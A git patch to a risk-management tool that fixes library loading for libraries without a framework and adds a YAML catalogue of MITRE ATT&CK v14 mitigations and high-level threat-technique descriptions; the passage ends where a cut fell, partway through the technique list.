From ea8793893029aef7308098b59bf8894428611b29 Mon Sep 17 00:00:00 2001 From: eric-intuitem <71850047+eric-intuitem@users.noreply.github.com> Date: Wed, 22 Nov 2023 22:23:22 +0100 Subject: [PATCH] add mitre-attack fix errors when loading library without framework --- core/helpers.py | 2 +- library/helpers.py | 29 +- library/libraries/mitre-attack.yaml | 5252 +++++++++++++++++++++++++++ library/views.py | 2 +- 4 files changed, 5269 insertions(+), 16 deletions(-) create mode 100644 library/libraries/mitre-attack.yaml diff --git a/core/helpers.py b/core/helpers.py index b1594af..541f974 100644 --- a/core/helpers.py +++ b/core/helpers.py @@ -230,4 +230,4 @@ def get_sorted_requirements_and_groups_rec(requirements: list, requirement_group requirements, requirement_groups, requirements_assessed, - [rg for rg in requirement_groups if not rg.parent_urn]) + [rg for rg in requirement_groups if not rg.parent_urn] if requirement_groups else []) diff --git a/library/helpers.py b/library/helpers.py index dc2416b..c09d53e 100644 --- a/library/helpers.py +++ b/library/helpers.py @@ -8,23 +8,24 @@ def preview_library(library) -> list: preview = {} requirement_groups_list = [] requirements_list = [] - if library['objects']['framework'].get('requirement_groups'): - for requirement_group in library['objects']['framework']['requirement_groups']: + framework = library['objects'].get('framework') + if framework: + for requirement_group in library['objects']['framework'].get('requirement_groups'): requirement_groups_list.append( RequirementGroup(description = requirement_group.get('description'), name = requirement_group['name'], urn = requirement_group['urn'], parent_urn = requirement_group.get('parent_urn'))) - for requirement in library['objects']['framework']['requirements']: - if Requirement.objects.filter(urn=requirement['urn']).exists(): - requirements_list.append(Requirement.objects.get(urn=requirement['urn'])) - else: - temp_req = Requirement(description = requirement.get('description'), - name = requirement['name'], - urn = requirement['urn'], - parent_urn = requirement.get('parent_urn'), - folder = Folder.get_root_folder()) - requirements_list.append(temp_req) - preview['requirement_groups'] = requirement_groups_list - preview['requirements'] = requirements_list + for requirement in library['objects']['framework'].get('requirements'): + if Requirement.objects.filter(urn=requirement['urn']).exists(): + requirements_list.append(Requirement.objects.get(urn=requirement['urn'])) + else: + temp_req = Requirement(description = requirement.get('description'), + name = requirement['name'], + urn = requirement['urn'], + parent_urn = requirement.get('parent_urn'), + folder = Folder.get_root_folder()) + requirements_list.append(temp_req) + preview['requirement_groups'] = requirement_groups_list + preview['requirements'] = requirements_list return preview diff --git a/library/libraries/mitre-attack.yaml b/library/libraries/mitre-attack.yaml new file mode 100644 index 0000000..4066877 --- /dev/null +++ b/library/libraries/mitre-attack.yaml @@ -0,0 +1,5252 @@ +urn: urn:intuitem:risk:library:mitre-attack-v14 +locale: en +name: Mitre ATT&CK v14 - Threats and mitigations +description: Mitre ATT&CK v14 - Threats and mitigations +copyright: "Terms of Use\nLICENSE\nThe MITRE Corporation (MITRE) hereby grants you\ + \ a non-exclusive, royalty-free license to use ATT&CK\xAE for research, development,\ + \ and commercial purposes. Any copy you make for such purposes is authorized provided\ + \ that you reproduce MITRE's copyright designation and this license in any such\ + \ copy.\n\"\xA9 2022 The MITRE Corporation. This work is reproduced and distributed\ + \ with the permission of The MITRE Corporation.\"\nDISCLAIMERS\nMITRE does not claim\ + \ ATT&CK enumerates all possibilities for the types of actions and behaviors documented\ + \ as part of its adversary model and framework of techniques. Using the information\ + \ contained within ATT&CK to address or cover full categories of techniques will\ + \ not guarantee full defensive coverage as there may be undisclosed techniques or\ + \ variations on existing techniques not documented by ATT&CK.\nALL DOCUMENTS AND\ + \ THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN \"AS IS\" BASIS AND THE CONTRIBUTOR,\ + \ THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION,\ + \ ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES,\ + \ EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF\ + \ THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES\ + \ OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE." +version: 1 +objects: + security_functions: + - urn: urn:intuitem:risk:function:mitre-attack:M1031 + name: M1031 - Network Intrusion Prevention + provider: MITRE ATT&CK + description: 'Use intrusion detection signatures to block traffic at network boundaries. + + https://attack.mitre.org/mitigations/M1031 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1016 + name: M1016 - Vulnerability Scanning + provider: MITRE ATT&CK + description: 'Vulnerability scanning is used to find potentially exploitable software + vulnerabilities to remediate them. + + https://attack.mitre.org/mitigations/M1016 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1035 + name: M1035 - Limit Access to Resource Over Network + provider: MITRE ATT&CK + description: 'Prevent access to file shares, remote access to systems, unnecessary + services. Mechanisms to limit access may include use of network concentrators, + RDP gateways, etc. + + https://attack.mitre.org/mitigations/M1035 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1029 + name: M1029 - Remote Data Storage + provider: MITRE ATT&CK + description: 'Use remote security log and sensitive file storage where access + can be controlled better to prevent exposure of intrusion detection log data + or sensitive information. + + https://attack.mitre.org/mitigations/M1029 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1037 + name: M1037 - Filter Network Traffic + provider: MITRE ATT&CK + description: 'Use network appliances to filter ingress or egress traffic and perform + protocol-based filtering. Configure software on endpoints to filter network + traffic. + + https://attack.mitre.org/mitigations/M1037 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1021 + name: M1021 - Restrict Web-Based Content + provider: MITRE ATT&CK + description: 'Restrict use of certain websites, block downloads/attachments, block + Javascript, restrict browser extensions, etc. + + https://attack.mitre.org/mitigations/M1021 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1033 + name: M1033 - Limit Software Installation + provider: MITRE ATT&CK + description: 'Block users or groups from installing unapproved software. + + https://attack.mitre.org/mitigations/M1033 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1013 + name: M1013 - Application Developer Guidance + provider: MITRE ATT&CK + description: 'This mitigation describes any guidance or training given to developers + of applications to avoid introducing security weaknesses that an adversary may + be able to take advantage of. + + https://attack.mitre.org/mitigations/M1013 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1034 + name: M1034 - Limit Hardware Installation + provider: MITRE ATT&CK + description: 'Block users or groups from installing or using unapproved hardware + on systems, including USB devices. + + https://attack.mitre.org/mitigations/M1034 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1017 + name: M1017 - User Training + provider: MITRE ATT&CK + description: 'Train users to be aware of access or manipulation attempts by an + adversary to reduce the risk of successful spearphishing, social engineering, + and other techniques that involve user interaction. + + https://attack.mitre.org/mitigations/M1017 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1052 + name: M1052 - User Account Control + provider: MITRE ATT&CK + description: 'Configure Windows User Account Control to mitigate risk of adversaries + obtaining elevated process access. + + https://attack.mitre.org/mitigations/M1052 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1028 + name: M1028 - Operating System Configuration + provider: MITRE ATT&CK + description: 'Make configuration changes related to the operating system or a + common feature of the operating system that result in system hardening against + techniques. + + https://attack.mitre.org/mitigations/M1028 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1053 + name: M1053 - Data Backup + provider: MITRE ATT&CK + description: 'Take and store data backups from end user systems and critical servers. + Ensure backup and storage systems are hardened and kept separate from the corporate + network to prevent compromise. + + https://attack.mitre.org/mitigations/M1053 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1038 + name: M1038 - Execution Prevention + provider: MITRE ATT&CK + description: 'Block execution of code on a system through application control, + and/or script blocking. + + https://attack.mitre.org/mitigations/M1038 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1043 + name: M1043 - Credential Access Protection + provider: MITRE ATT&CK + description: 'Use capabilities to prevent successful credential access by adversaries; + including blocking forms of credential dumping. + + https://attack.mitre.org/mitigations/M1043 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1045 + name: M1045 - Code Signing + provider: MITRE ATT&CK + description: 'Enforce binary and application integrity with digital signature + verification to prevent untrusted code from executing. + + https://attack.mitre.org/mitigations/M1045 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1039 + name: M1039 - Environment Variable Permissions + provider: MITRE ATT&CK + description: 'Prevent modification of environment variables by unauthorized users + and groups. + + https://attack.mitre.org/mitigations/M1039 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1057 + name: M1057 - Data Loss Prevention + provider: MITRE ATT&CK + description: 'Use a data loss prevention (DLP) strategy to categorize sensitive + data, identify data formats indicative of personal identifiable information + (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data + Loss Prevention) + + https://attack.mitre.org/mitigations/M1057 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1025 + name: M1025 - Privileged Process Integrity + provider: MITRE ATT&CK + description: 'Protect processes with high privileges that can be used to interact + with critical system components through use of protected process light, anti-process + injection defenses, or other process integrity enforcement measures. + + https://attack.mitre.org/mitigations/M1025 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1055 + name: M1055 - Do Not Mitigate + provider: MITRE ATT&CK + description: 'This category is to associate techniques that mitigation might increase + risk of compromise and therefore mitigation is not recommended. + + https://attack.mitre.org/mitigations/M1055 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1056 + name: M1056 - Pre-compromise + provider: MITRE ATT&CK + description: 'This category is used for any applicable mitigation activities that + apply to techniques occurring before an adversary gains Initial Access, such + as Reconnaissance and Resource Development techniques. + + https://attack.mitre.org/mitigations/M1056 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1020 + name: M1020 - SSL/TLS Inspection + provider: MITRE ATT&CK + description: 'Break and inspect SSL/TLS sessions to look at encrypted web traffic + for adversary activity. + + https://attack.mitre.org/mitigations/M1020 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1046 + name: M1046 - Boot Integrity + provider: MITRE ATT&CK + description: 'Use secure methods to boot a system and verify the integrity of + the operating system and loading mechanisms. + + https://attack.mitre.org/mitigations/M1046 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1030 + name: M1030 - Network Segmentation + provider: MITRE ATT&CK + description: 'Architect sections of the network to isolate critical systems, functions, + or resources. Use physical and logical segmentation to prevent access to potentially + sensitive systems and information. Use a DMZ to contain any internet-facing + services that should not be exposed from the internal network. Configure separate + virtual private cloud (VPC) instances to isolate critical cloud systems. + + https://attack.mitre.org/mitigations/M1030 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1019 + name: M1019 - Threat Intelligence Program + provider: MITRE ATT&CK + description: 'A threat intelligence program helps an organization generate their + own threat intelligence information and track trends to inform defensive priorities + to mitigate risk. + + https://attack.mitre.org/mitigations/M1019 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1027 + name: M1027 - Password Policies + provider: MITRE ATT&CK + description: 'Set and enforce secure password policies for accounts. + + https://attack.mitre.org/mitigations/M1027 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1040 + name: M1040 - Behavior Prevention on Endpoint + provider: MITRE ATT&CK + description: 'Use capabilities to prevent suspicious behavior patterns from occurring + on endpoint systems. This could include suspicious process, file, API call, + etc. behavior. + + https://attack.mitre.org/mitigations/M1040 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1018 + name: M1018 - User Account Management + provider: MITRE ATT&CK + description: 'Manage the creation, modification, use, and permissions associated + to user accounts. + + https://attack.mitre.org/mitigations/M1018 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1022 + name: M1022 - Restrict File and Directory Permissions + provider: MITRE ATT&CK + description: 'Restrict access by setting directory and file permissions that are + not specific to users or privileged accounts. + + https://attack.mitre.org/mitigations/M1022 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1026 + name: M1026 - Privileged Account Management + provider: MITRE ATT&CK + description: 'Manage the creation, modification, use, and permissions associated + to privileged accounts, including SYSTEM and root. + + https://attack.mitre.org/mitigations/M1026 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1024 + name: M1024 - Restrict Registry Permissions + provider: MITRE ATT&CK + description: 'Restrict the ability to modify certain hives or keys in the Windows + Registry. + + https://attack.mitre.org/mitigations/M1024 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1049 + name: M1049 - Antivirus/Antimalware + provider: MITRE ATT&CK + description: 'Use signatures or heuristics to detect malicious software. + + https://attack.mitre.org/mitigations/M1049 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1032 + name: M1032 - Multi-factor Authentication + provider: MITRE ATT&CK + description: 'Use two or more pieces of evidence to authenticate to a system; + such as username and password in addition to a token from a physical smart card + or token generator. + + https://attack.mitre.org/mitigations/M1032 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1054 + name: M1054 - Software Configuration + provider: MITRE ATT&CK + description: 'Implement configuration changes to software (other than the operating + system) to mitigate security risks associated to how the software operates. + + https://attack.mitre.org/mitigations/M1054 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1048 + name: M1048 - Application Isolation and Sandboxing + provider: MITRE ATT&CK + description: 'Restrict execution of code to a virtual environment on or in transit + to an endpoint system. + + https://attack.mitre.org/mitigations/M1048 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1047 + name: M1047 - Audit + provider: MITRE ATT&CK + description: 'Perform audits or scans of systems, permissions, insecure software, + insecure configurations, etc. to identify potential weaknesses. + + https://attack.mitre.org/mitigations/M1047 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1050 + name: M1050 - Exploit Protection + provider: MITRE ATT&CK + description: 'Use capabilities to detect and block conditions that may lead to + or be indicative of a software exploit occurring. + + https://attack.mitre.org/mitigations/M1050 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1015 + name: M1015 - Active Directory Configuration + provider: MITRE ATT&CK + description: 'Configure Active Directory to prevent use of certain techniques; + use SID Filtering, etc. + + https://attack.mitre.org/mitigations/M1015 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1051 + name: M1051 - Update Software + provider: MITRE ATT&CK + description: 'Perform regular software updates to mitigate exploitation risk. + + https://attack.mitre.org/mitigations/M1051 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1044 + name: M1044 - Restrict Library Loading + provider: MITRE ATT&CK + description: 'Prevent abuse of library loading mechanisms in the operating system + and software to load untrusted code by configuring appropriate library loading + mechanisms and investigating potential vulnerable software. + + https://attack.mitre.org/mitigations/M1044 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1042 + name: M1042 - Disable or Remove Feature or Program + provider: MITRE ATT&CK + description: 'Remove or deny access to unnecessary and potentially vulnerable + software to prevent abuse by adversaries. + + https://attack.mitre.org/mitigations/M1042 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1036 + name: M1036 - Account Use Policies + provider: MITRE ATT&CK + description: 'Configure features related to account use like login attempt lockouts, + specific login times, etc. + + https://attack.mitre.org/mitigations/M1036 + + ' + version: '1.0' + - urn: urn:intuitem:risk:function:mitre-attack:M1041 + name: M1041 - Encrypt Sensitive Information + provider: MITRE ATT&CK + description: 'Protect sensitive information with strong encryption. + + https://attack.mitre.org/mitigations/M1041 + + ' + version: '1.0' + threats: + - urn: urn:intuitem:risk:threat:mitre-attack:T1047 + name: T1047 - Windows Management Instrumentation + provider: MITRE ATT&CK + description: 'Adversaries may abuse Windows Management Instrumentation (WMI) to + execute malicious commands and payloads. WMI is an administration feature that + provides a uniform environment to access Windows system components. The WMI + service enables both local and remote access, though the latter is facilitated + by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed + Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) + and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) + (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas + WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: + MSDN WMI)(Citation: FireEye WMI 2015) + + + An adversary can use WMI to interact with local and remote systems and use it + as a means to execute various behaviors, such as gathering information for Discovery + as well as remote Execution of files as part of Lateral Movement. (Citation: + FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) + + https://attack.mitre.org/techniques/T1047' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1113 + name: T1113 - Screen Capture + provider: MITRE ATT&CK + description: 'Adversaries may attempt to take screen captures of the desktop to + gather information over the course of an operation. Screen capturing functionality + may be included as a feature of a remote access tool used in post-compromise + operations. Taking a screenshot is also typically possible through native utilities + or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: + CopyFromScreen .NET)(Citation: Antiquated Mac Malware) + + https://attack.mitre.org/techniques/T1113' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1037 + name: T1037 - Boot or Logon Initialization Scripts + provider: MITRE ATT&CK + description: "Adversaries may use scripts automatically executed at boot or logon\ + \ initialization to establish persistence. Initialization scripts can be used\ + \ to perform administrative functions, which may often execute other programs\ + \ or send information to an internal logging server. These scripts can vary\ + \ based on operating system and whether applied locally or remotely. \n\nAdversaries\ + \ may use these scripts to maintain persistence on a single system. Depending\ + \ on the access configuration of the logon scripts, either local credentials\ + \ or an administrator account may be necessary. \n\nAn adversary may also be\ + \ able to escalate their privileges since some boot or logon initialization\ + \ scripts run with higher privileges.\nhttps://attack.mitre.org/techniques/T1037" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1557 + name: T1557 - Adversary-in-the-Middle + provider: MITRE ATT&CK + description: 'Adversaries may attempt to position themselves between two or more + networked devices using an adversary-in-the-middle (AiTM) technique to support + follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), + [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), + or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). + By abusing features of common networking protocols that can determine the flow + of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device + to communicate through an adversary controlled system so they can collect information + or perform additional actions.(Citation: Rapid7 MiTM Basics) + + + For example, adversaries may manipulate victim DNS settings to enable other + malicious activities such as preventing/redirecting users from accessing legitimate + sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: + ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their + position in order to intercept user credentials and session cookies.(Citation: + volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s + can also be used to establish an AiTM position, such as by negotiating a less + secure, deprecated, or weaker version of communication protocol (SSL/TLS) or + encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: + tlseminar_downgrade_att) + + + Adversaries may also leverage the AiTM position to attempt to monitor and/or + modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). + Adversaries can setup a position similar to AiTM to prevent traffic from flowing + to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) + and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498). + + https://attack.mitre.org/techniques/T1557' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1033 + name: T1033 - System Owner/User Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to identify the primary user, currently + logged in user, set of users that commonly uses a system, or whether a user + is actively using the system. They may do this, for example, by retrieving account + usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). + The information may be collected in a number of different ways using other Discovery + techniques, because user and username details are prevalent throughout a system + and include running process ownership, file/directory ownership, session information, + and system logs. Adversaries may use the information from [System Owner/User + Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery + to shape follow-on behaviors, including whether or not the adversary fully infects + the target and/or attempts specific actions. + + + Various utilities and commands may acquire this information, including whoami. + In macOS and Linux, the currently logged in user can be identified with w + and who. On macOS the dscl . list /Users | grep -v ''_'' + command can also be used to enumerate user accounts. Environment variables, + such as %USERNAME% and $USER, may also be used to + access this information. + + + On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) + commands such as `show users` and `show ssh` can be used to display users currently + logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT + TA18-106A Network Infrastructure Devices 2018) + + https://attack.mitre.org/techniques/T1033' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1583 + name: T1583 - Acquire Infrastructure + provider: MITRE ATT&CK + description: 'Adversaries may buy, lease, or rent infrastructure that can be used + during targeting. A wide variety of infrastructure exists for hosting and orchestrating + adversary operations. Infrastructure solutions include physical or cloud servers, + domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, + botnets are available for rent or purchase. + + + Use of these infrastructure solutions allows adversaries to stage, launch, and + execute operations. Solutions may help adversary operations blend in with traffic + that is seen as normal, such as contacting third-party web services or acquiring + infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), + including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: + FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) + Depending on the implementation, adversaries may use infrastructure that makes + it difficult to physically tie back to them as well as utilize infrastructure + that can be rapidly provisioned, modified, and shut down. + + https://attack.mitre.org/techniques/T1583' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1613 + name: T1613 - Container and Resource Discovery + provider: MITRE ATT&CK + description: "Adversaries may attempt to discover containers and other resources\ + \ that are available within a containers environment. Other resources may include\ + \ images, deployments, pods, nodes, and other information such as the status\ + \ of a cluster.\n\nThese resources can be viewed within web applications such\ + \ as the Kubernetes dashboard or can be queried via the Docker and Kubernetes\ + \ APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may\ + \ leak information about the environment, such as the environment\u2019s configuration,\ + \ which services are available, and what cloud provider the victim may be utilizing.\ + \ The discovery of these resources may inform an adversary\u2019s next steps\ + \ in the environment, such as how to perform lateral movement and which methods\ + \ to utilize for execution.\nhttps://attack.mitre.org/techniques/T1613" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1592 + name: T1592 - Gather Victim Host Information + provider: MITRE ATT&CK + description: 'Adversaries may gather information about the victim''s hosts that + can be used during targeting. Information about hosts may include a variety + of details, including administrative data (ex: name, assigned IP, functionality, + etc.) as well as specifics regarding its configuration (ex: operating system, + language, etc.). + + + Adversaries may gather this information in various ways, such as direct collection + actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or + [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries + may also compromise sites then include malicious content designed to collect + host information from visitors.(Citation: ATT ScanBox) Information about hosts + may also be exposed to adversaries via online or other accessible data sets + (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search + Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering + this information may reveal opportunities for other forms of reconnaissance + (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) + or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), + establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) + or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or + initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) + or [External Remote Services](https://attack.mitre.org/techniques/T1133)). + + https://attack.mitre.org/techniques/T1592' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1003 + name: T1003 - OS Credential Dumping + provider: MITRE ATT&CK + description: 'Adversaries may attempt to dump credentials to obtain account login + and credential material, normally in the form of a hash or a clear text password, + from the operating system and software. Credentials can then be used to perform + [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted + information. + + + Several of the tools mentioned in associated sub-techniques may be used by both + adversaries and professional security testers. Additional custom tools likely + exist as well. + + https://attack.mitre.org/techniques/T1003' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1129 + name: T1129 - Shared Modules + provider: MITRE ATT&CK + description: 'Adversaries may execute malicious payloads via loading shared modules. + Shared modules are executable files that are loaded into processes to provide + access to reusable code, such as specific custom functions or invoking OS API + functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)). + + + Adversaries may use this functionality as a way to execute arbitrary payloads + on a victim system. For example, adversaries can modularize functionality of + their malware into shared objects that perform various functions such as managing + C2 network communications or execution of specific actions on objective. + + + The Linux & macOS module loader can load and execute shared objects from arbitrary + local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` + and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` + files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: + RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017) + + + The Windows module loader can be instructed to load DLLs from arbitrary local + paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality + resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) + which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft + DLL) + + https://attack.mitre.org/techniques/T1129' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1602 + name: T1602 - Data from Configuration Repository + provider: MITRE ATT&CK + description: 'Adversaries may collect data related to managed devices from configuration + repositories. Configuration repositories are used by management systems in order + to configure, manage, and control data on remote systems. Configuration repositories + may also facilitate remote access and administration of devices. + + + Adversaries may target these repositories in order to collect large quantities + of sensitive system administration data. Data from configuration repositories + may be exposed by various protocols and software and can store a wide variety + of data, much of which may align with adversary Discovery objectives.(Citation: + US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017) + + https://attack.mitre.org/techniques/T1602' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1006 + name: T1006 - Direct Volume Access + provider: MITRE ATT&CK + description: 'Adversaries may directly access a volume to bypass file access controls + and file system monitoring. Windows allows programs to have direct access to + logical volumes. Programs with direct access may read and write files directly + from the drive by analyzing file system data structures. This technique may + bypass Windows file access controls as well as file system monitoring tools. + (Citation: Hakobyan 2009) + + + Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: + Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party + utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) + to create shadow copies or backups of data from system volumes.(Citation: LOLBAS + Esentutl) + + https://attack.mitre.org/techniques/T1006' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1014 + name: T1014 - Rootkit + provider: MITRE ATT&CK + description: "Adversaries may use rootkits to hide the presence of programs, files,\ + \ network connections, services, drivers, and other system components. Rootkits\ + \ are programs that hide the existence of malware by intercepting/hooking and\ + \ modifying operating system API calls that supply system information. (Citation:\ + \ Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality\ + \ may reside at the user or kernel level in the operating system or lower, to\ + \ include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001).\ + \ (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux,\ + \ and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat\ + \ Mac OSX Rootkit)\nhttps://attack.mitre.org/techniques/T1014" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1123 + name: T1123 - Audio Capture + provider: MITRE ATT&CK + description: 'An adversary can leverage a computer''s peripheral devices (e.g., + microphones and webcams) or applications (e.g., voice and video call services) + to capture audio recordings for the purpose of listening into sensitive conversations + to gather information. + + + Malware or scripts may be used to interact with the devices through an available + API provided by the operating system or an application to capture audio. Audio + files may be written to disk and exfiltrated later. + + https://attack.mitre.org/techniques/T1123' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1543 + name: T1543 - Create or Modify System Process + provider: MITRE ATT&CK + description: "Adversaries may create or modify system-level processes to repeatedly\ + \ execute malicious payloads as part of persistence. When operating systems\ + \ boot up, they can start processes that perform background system functions.\ + \ On Windows and Linux, these system processes are referred to as services.(Citation:\ + \ TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)\ + \ and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run\ + \ to finish system initialization and load user specific parameters.(Citation:\ + \ AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,\ + \ daemons, or agents that can be configured to execute at startup or a repeatable\ + \ interval in order to establish persistence. Similarly, adversaries may modify\ + \ existing services, daemons, or agents to achieve the same effect. \n\nServices,\ + \ daemons, or agents may be created with administrator privileges but executed\ + \ under root/SYSTEM privileges. Adversaries may leverage this functionality\ + \ to create or modify system processes in order to escalate privileges.(Citation:\ + \ OSX Malware Detection)\nhttps://attack.mitre.org/techniques/T1543" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1133 + name: T1133 - External Remote Services + provider: MITRE ATT&CK + description: "Adversaries may leverage external-facing remote services to initially\ + \ access and/or persist within a network. Remote services such as VPNs, Citrix,\ + \ and other access mechanisms allow users to connect to internal enterprise\ + \ network resources from external locations. There are often remote service\ + \ gateways that manage connections and credential authentication for these services.\ + \ Services such as [Windows Remote 